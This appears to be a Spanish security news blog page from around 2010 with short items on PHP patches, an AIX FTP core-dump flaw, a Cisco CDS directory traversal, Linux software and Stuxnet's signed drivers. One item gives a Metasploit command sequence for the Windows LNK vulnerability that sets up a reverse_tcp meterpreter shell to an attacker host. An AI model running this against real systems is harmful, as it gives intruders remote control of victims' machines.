Nuevas versiones de PHP solucionan varios fallos de seguridad

Se han publicado recientemente nuevas versiones de PHP (versiones 5.2.14 y 5.3.3) que solucionan múltiples problemas de seguridad, que podrían permitir evitar restricciones de seguridad, provocar denegaciones de servicio, obtener información sensible o comprometer los sistemas afectados.

PHP es un lenguaje interpretado de propósito general ampliamente usado, que está diseñado para desarrollo web y puede ser embebido dentro de código HTML. PHP está orientado a la creación de páginas web dinámicas, ejecutándose en un servidor web (server-side scripting), de forma que primero se toma el código en PHP como entrada y se devuelven las páginas web como salida.

Leer más

Revelación de información a través del servidor FTP de AIX 5.x

Existe un fallo en el servidor FTP a la hora de manejar comandos NLST a los que se le pasan parámetros especialmente manipulados. Esto podría ser aprovechado por un atacante remoto para provocar un volcado del core del proceso FTP accesible por este medio. Entre esos datos, podrían encontrarse hashes de contraseñas.
Un atacante podría enviar un comando NLST a un servidor FTP (al que se debe tener previamente acceso aunque sea con cuenta de enviado) seguido de unos 5000 caracteres para provcar el volcado. Luego el fichero con los hashes (que previamente debe generar con intentos fallidos de adivinar la contraseña) quedará accesible para descarga.

Leer más

Escalada de directorios en Cisco Content Delivery System

Cisco ha anunciado la existencia de una vulnerabilidad en Cisco Content Delivery System (CDS), y que podría permitir a un atacante conseguir acceso no autorizado a archivos arbitrarios de los sistemas afectados.

El problema reside en un error de validación de entradas en el servidor web de la aplicación Internet Streamer, que un atacante podría aprovechar para acceder a los contenidos de cualquier archivo (archivos de contraseñas, logs, configuraciónes, etc.) mediante ataques de escalada de directorios.

Leer más

Aplicaciones “portables” para Linux

Portable Linux Apps es una gran iniciativa del proyecto Elementary, que pretende traer aplicaciones portátiles a Linux, tal como las ya conocidas Portable Apps para Windows, solo que tiene varias características que lo ponen varios peldaños arriba. Esto lo logran mediante un nuevo formato de archivo llamado AppImage que utiliza un único archivo para una aplicación completa, y lo mas interesante es que puede ser ejecutada indistintamente en cualquier distro Linux, probada con éxito hasta ahora en Ubuntu, Fedora y openSUSE.

Leer más

Instalar Mandriva Enterprise Server y Administrar graficamente Controlador de Dominio Principal (PDC)

Nunca había instalado un Mandriva, y la verdad… que a la hora de la instalación es muy sencilla y muy intuitiva. Y es mi primera vez con un Server bajo GNU/Linux con interfaz grafica.

Herramientas a utilizar:

Oracle VM Virtualbox ( En mi caso voy a virtualizar el servidor)

Mandriva Enterprise Server 5

Cliente Windows

Descargar Mandriva Enterprise Server

Leer más

Explotando «LNK» con MetaSploit

MetaSploit nuevamente tiene un PoC para una vulnerabilidad que todavía no posee un parche de corrección de Microsoft.

Para testear esta vulnerabilidad primero debemos actualizar el framework con «svn update», y luego hacemos lo siguiente:

use windows/browser/ms10_xxx_windows_shell_lnk_execute
set SRVHOST 192.168.162.136
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.162.136
set LPORT 443
exploit

De esta forma vamos a levantar un servidor web en el puerto 80, que cuando la víctima lo visite, nos dará una shell de meterpreter a través del puerto 443. Funciona muy bien!

Todavía no hay un parche de seguridad de Microsoft para corregir este problema, pero pueden encontrar algunos workarounds a continuación:

Microsoft Security Advisory (2286198)
– Security By Default: Solución a la vulnerabilidad «LNK» de Windows mediante Directivas de Restricción de Software
Fuente: http://www.kungfoosion.com/

La nueva variante del Stuxnet vuelve a estar firmada con un certificado válid

El último ataque contra Windows (con enlaces directos) fue descubierto a través de un troyano que ha sido bautizado como Stuxnet. Una de sus características era que los drivers que usaba estaban firmados digitalmente por la famosa empresa china Realtek. Ahora, después de que hayan sido revocados, los atacantes han comenzado a utilizar los de otra empresa legítima: JMicron Technology Corporation.

Los drivers de Stuxnet utilizados como rootkit, estaban firmados digitalmente por la famosa empresa china Realtek. Esto significa que, en principio, solo Realtek puede ser responsable de ese código… excepto que su clave privada haya sido comprometida de alguna forma, cosa que no se ha confirmado todavía. En cualquier caso, Microsoft ha trabajado con Verisign para revocar en sus sistemas los certificados (con el apoyo de Realtek también). Parece que ante este «contratiempo» los atacantes han reaccionado firmando su troyano de nuevo con un certificado válido de otra empresa Taiwanesa dedicada también a crear controladores, llamada JMicron.

Leer más